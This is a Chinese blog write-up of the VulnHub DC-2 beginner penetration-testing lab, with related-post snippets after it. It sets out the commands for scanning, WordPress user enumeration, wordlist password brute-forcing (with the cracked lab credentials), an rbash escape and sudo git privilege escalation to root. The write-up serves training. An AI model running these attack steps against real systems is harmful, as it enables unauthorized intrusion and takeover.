DC-2通关基本步骤

已于 2024-10-09 13:59:29 修改
阅读量436 收藏 10
点赞数 7
文章标签: web安全 安全
于 2024-10-08 20:02:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84645748/article/details/142763131
版权
  • 环境搭建:

与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始,和DC-1一样,有五个flag

2,靶场下载环境为:https://www.vulnhub.com/entry/dc-2,311/

二,渗透靶场

1,攻击目标:就是我们搭建的dc靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP(自己虚拟机的IP)

命令:nmap -sP 192.168.0.10

3,信息收集:探寻端口和服务

命令:nmap -A -p- -v 192.168.0.11

发现开放了80端口,存在web服务,Apache/2.4.10,

发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

4,接下来访问web站点

发现页面访问不了,我们需要修改hosts文件,添加一个IP域名指向

5,修改hosts文件

命令:vim /etc/hosts

添加成功后再去访问即可成功

三,发现flag1

这些大概意思是:你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录,就是暴力破解账号,密码

四,目录扫描

命令:dirb http://dc-2/

发现有个像后台地址,在火狐页面登录,但是没什么可以用的东西图一乐就行

五,用户名枚举

Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

1,扫描一下WordPress版本

命令:wpscan --url http://dc-2

然后发现了WordPress4.7.10版本

2,在登录页面登录一下,输入账号和密码,但是提示不存在此用户,可以用用户枚举

六,先用个用户枚举,尝试得到用户爆破密码

命令:wpscan --url http://dc-2 --enumerate u

 枚举出了三个:admin   jerry   tom

七,使用暴力破解出账号和密码

命令:cewl http://dc-2/ -w dc2..txt

1,使用wpscan进行暴力破解

命令:wpscan --url http://dc-2 --passwords dc2.txt

看到爆破出了两个账号

2,jerry/adipiscing     tom/parturient使用这两个登录站点

jerry/adipiscing登录页面

 tom/parturient登录页面

八,发现flag2

登录后看到flag2,我用的Jerry账号登录的

点开flag2看到提示信息,如果WordPress不行的话我们可以看看ssh

意思就是:

如果你不能利用WordPress并采取一条捷径,还有另外一种方法,希望你找到了另一个入口

九,在tom的家目录发现flag3

1.先登录ssh

命令;ssh tom@192.168.0.11 -p 7744

然后发现了flag3

2,我们发现了 less和vi可以来查看,内容显示如下

3,然后使用rbash绕过详情参考:https://xz.aliyun.com/t/7642

命令;echo $PATH,使用cd加目录进不去,使用ls直接查看目录内的信息

4,使用命令绕过rbash:

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

十,1.在Jerry家目录发现了flag4

2,然后输入命令:cat flag4.txt

大概意思:

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

很高兴看到你走了这么远,但你还没回家,您仍然需要获得最后的标志(唯一真正重要的标志,这里没有暗示,你现在只能靠自己了,继续,猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

3,我们使用tom来运行sudo,切换到Jerry用户

命令:sudo -l

十一,提权

1,查看可以使用的root权限命令

命令:find / -user root -perm -4000 -print 2>/dev/null

2,Jerry用户不可直接使用sudo su

使用git进行提取

命令:sudo git help status

这样提权成功

十二,发现final-flag。txt

命令:cd /root

cat final-flag.txt

恭喜贺喜宝子们通过了哈哈哈,太厉害了

耗一个蹦
关注
DC-2通关详解
海里游的一条鱼
09-26 1050
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。
DC-1通关详解
2401_84741371的博客
09-19 785
此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。查看www目录文件,发现1.txt文件,打开发现提示信息,内容寻找站点的配置文件。扫描网段中有哪些主机在线,使用-sP参数,不扫描端口,只扫描(存活主机)。登陆战点之后,随便翻一番,发现flag3,点击flag3进入,发现提示信息。8.进入home目录,发现flag4.txt文件,提示需要提升文件。发现了22开放端口,开放了ssh服务,OpenSSH 6.0p1。
DC-3靶场通关详细步骤
最新发布
2301_79931281的博客
10-06 1033
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1056
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1307
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
新手DC-1通关思路
SuchAprettyBoi的博客
08-10 579
文章目录前言一、DC-1是什么?二、准备流程1.要用到的工具2.初始化虚拟机3.开始前夕!!!三、开始渗透总结 前言 通关后,来复盘一下,顺便巩固一下学到的新东西 一、DC-1是什么? DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. DC-1 是一个特意建造的易受攻击的靶机环境,目的是在渗透测试领域获得经验。 It
DC-2详细通关实验报告
2301_78713407的博客
09-27 1248
DC-2和DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是要获得渗透测试领域的经验。点击去之后,我们可以看到flag2的提示信息,简单来说就是如果wordpress不可以的话就需要其他方法,我们之前发现有ssh,我们可以看看ssh.发现访问不了,而且发现我们输入的IP地址自动转化为了域名,dc-2这个域名解析失败了,我们需要更改hosts文件,添加一个IP的域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc -2/ > 1.txt。
DC-2靶机通关
m0_57206390的博客
08-19 137
DC-2靶机通关,详解
DC-3通关详解
海里游的一条鱼
10-06 1166
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@彦鱼 上推我让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。对于那些有CTF和Boot2Root挑战经验的人来说,这可能不会花你很长时间(事实上,它可能只需要不到20分钟)
精品资料(2021-2022年收藏)企业海关商检备案注册流程.doc
10-10
1. 在鞍山海关报关厅6号窗口领取相关表格,包括《报关单位情况登记表》、《报关单位管理人员情况登记表》和《DC2003企业基本信息表》,并确保信息填写准确。 2. 提交企业法人营业执照副本(个人独资、合伙企业或个体...
DC-1靶场实战-详细步骤
xt_beginner的博客
01-10 1046
DC-1靶场通关 一、搭建DC-1靶场 详情请看https://blog.csdn.net/xt_beginner/article/details/112442901 二、DC-1靶场攻略 使用nmap快速识别目标主机ip nmap -sP 192.168.74.0/24或arp-scan -l 得到信息:目标主机192.168.74.138 使用nmap快速识别目标主机服务,端口等 nmap -sS -A -p- 192.168.74.138 得到信息:目标主机开放22
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1432
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
ssti-lab靶场通关
09-02
chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] ...
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1646
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2015
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1320
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
No.2 笔记 | 网络安全攻防:PC、CS工具与移动应用分析
l1x1n0的博客
10-05 1215
Cobalt Strike是一款基于Java的高级渗透测试工具,支持多人协同操作。它被称为"线上多人运动平台",功能强大且灵活。通过学习PC端和移动端的恶意程序利用技术,以及Cobalt Strike这一强大的渗透测试工具,我们不仅掌握了一些网络攻击的基本原理和技术,更重要的是提高了自身的网络安全意识。然而,我们必须时刻牢记,这些知识的学习目的是为了更好地理解和防御网络攻击,而非从事任何非法活动。作为负责任的网络公民,我们有义务遵守相关法律法规,保护自己和他人的网络安全
Web安全 - 重放攻击(Replay Attack)
小工匠
10-01 1412
重放攻击(Replay Attack)是一种网络攻击方式,攻击者通过截取并重复发送已经捕获的合法通信数据包,企图在受害者不知情的情况下冒充合法用户进行操作。这种攻击常见于不安全的网络协议中,攻击者无需破解通信内容,只需重发合法的消息即可造成安全威胁。重放攻击的潜在危害包括:未授权的交易执行、非法获取资源、数据泄露以及系统篡改等。随着网络系统的日益复杂,重放攻击仍然是一个常见的威胁,尤其是在不具备防御机制的旧协议或自定义通信方案中。使用缓存减少存储开销。利用异步处理避免阻塞主线程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值